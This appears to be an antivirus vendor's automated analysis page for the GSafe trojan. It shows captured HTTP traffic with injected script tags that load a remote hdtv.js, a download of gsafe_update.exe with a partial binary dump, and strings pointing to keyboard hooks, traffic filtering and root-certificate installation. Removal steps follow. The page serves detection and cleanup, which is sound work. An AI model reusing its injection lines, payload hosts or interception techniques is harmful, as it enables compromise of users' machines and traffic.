User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gencolabsllc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Wed, 31 Dec 2014 11:01:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
X-Cache: BYPASS
</head>|<script src="hXXps://gsafejs.me/services/hdtv/hdtv.js
"></script></head>...



GET /services/hdtv_rules.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gencolabsllc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Wed, 31 Dec 2014 11:01:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
X-Cache: BYPASS
</head>|<script src="hXXps://gsafejs.me/services/hdtv/hdtv.js
"></script></head>...



GET /bin/gsafe_update.exe?dummy=573 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: gencolabsllc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Wed, 31 Dec 2014 11:01:25 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Last-Modified: Wed, 31 Dec 2014 11:01:01 GMT
ETag: "59c21d0-383c7-50b8105e2f540"
Accept-Ranges: bytes
Content-Length: 230343
X-Cache: BYPASS
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
......................................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc................v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

GSafe.exe_1268:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\nj_update.exe
hXXp://VVV.gencolabsllc.com/services/
_rules.php
hXXp://VVV.gencolabsllc.com/services/update.php?affid=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start GSafe
cmd.exe /c net stop GSafe
c:\log.log
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
pfc_setRootSSLCertSubject
5l6O6W6
< <$<(<,<0<4<8<<<
?!?%?)?-?1?5?9?=?
5%6x6
1 1$1(1,1014181
0&0.080=0
2%3)3-31383
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
=!=,=7=?=_=
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3034383<3@3
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nj_update.exe:1544
    GSafe.exe:832
    GSafe.exe:1596
    net1.exe:540
    net1.exe:440
    net1.exe:1100
    net.exe:1236
    net.exe:484
    net.exe:240
    %original file name%.exe:1244
    gsafe_setup.exe:1800

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %WinDir%\Temp\nsx85.tmp (1568 bytes)
    %WinDir%\Temp\nsx86.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\update[1].php (44 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\gsafe_update[1] (22973 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\hdtv_rules[1].htm (80 bytes)
    %WinDir%\Temp\GSafe\SSL\GSafe Intermediate SSL.pvk (1 bytes)
    %WinDir%\Temp\P_CheckUpdate.txt (44 bytes)
    %WinDir%\Temp\P_RuleList.txt (80 bytes)
    %WinDir%\Temp\GSafe\SSL\GSafe Intermediate SSL.cer (782 bytes)
    %WinDir%\Temp\nj_update.exe (18319 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\hdtv_rules[1].htm (80 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\gsafe_setup[1].exe (135314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\SelfDel.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\gsafe_setup.exe (135314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst7E.tmp (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDP3RRYS\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2VMDU78I\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y9G7U7CL\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SelfDel.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plc4.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\smime3.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll (6360 bytes)
    %System%\drivers\gfilterdrv.sys (55 bytes)
    %Program Files%\GSafe\remove_GSafe.exe (1568 bytes)
    %Program Files%\GSafe\ProtocolFilters.dll (12024 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import.bat (69 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\ns83.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy81.tmp (81025 bytes)
    %Program Files%\GSafe\nfregdrv.exe (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nss3.dll (12536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll (23936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\GSafeSSL.cer (782 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plds4.dll (784 bytes)
    %Program Files%\GSafe\ssleay32.dll (12088 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\System.dll (11 bytes)
    %Program Files%\GSafe\gfilterdrv.sys (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import_root_cert.exe (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\nsExec.dll (6 bytes)
    %Program Files%\GSafe\nfapi.dll (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SimpleSC.dll (1856 bytes)
    %Program Files%\GSafe\libeay32.dll (35507 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll (12536 bytes)
    %Program Files%\GSafe\GSafe.exe (15536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\certutil.exe (3312 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now